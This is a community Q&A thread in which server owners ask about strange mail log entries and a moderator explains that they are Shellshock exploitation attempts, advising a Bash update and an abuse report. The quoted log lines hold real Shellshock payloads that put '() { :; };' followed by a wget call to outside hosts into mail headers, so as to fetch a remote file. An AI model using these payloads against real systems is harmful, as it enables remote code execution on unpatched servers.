Odd mail hack attempt - can mail pull a wget?

October 21, 2014 2.5k views
alan92110
By:
alan92110

My mail log for “nobody@[mydomain.com]” shows this for every field - “To:”, “Date:” - all fields. It is from a Chinese IP address. The IP address in the wget is a DigitalOcean address, and the second IP is my server. It appears to be a dead link at this point.

Subject:() { :; };wget http://104.131.141.12:443/vul/[my-ip-address]

Any ideas? I’m lost on the ’ { :; }; ’ - is there a mail function that will execute the wget?

1 comment
  • scottsisco February 4, 2016

    I have the same question. I get bounce backs for undeliverable email when it hits my mail server and one of the emails looked like this. What vulnerability is this person trying to exploit?

    From () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
    Subject:() { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
    To () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback
    CC () { :; }; wget voude.marisa.com.br/dc.txt -O /tmp/dcback

Log In to Comment
1 Answer
kamaln7 MOD October 21, 2014

That looks like someone trying to exploit the Shellshock vulnerability on your droplet. Your droplet might be vulnerable if it’s running an older version of Bash. Take a look at How to Protect your Server Against the Shellshock Bash Vulnerability | DigitalOcean and make sure that your server is up to date, then you should have nothing to worry about :)

Can you please send an email to abuse@digitalocean.com with a bit more details and a snippet of your mail log (excluding unrelated emails)? Thanks!

How to Protect Your Server Against the Shellshock Bash Vulnerability
by Mitchell Anicas
On September 24, 2014, a GNU Bash vulnerability, referred to as Shellshock or the "Bash Bug", was disclosed. In short, the vulnerability allows remote attackers to execute arbitrary code given certain conditions, by passing strings of code following environment variable...
Reply
Have another answer? Share your knowledge.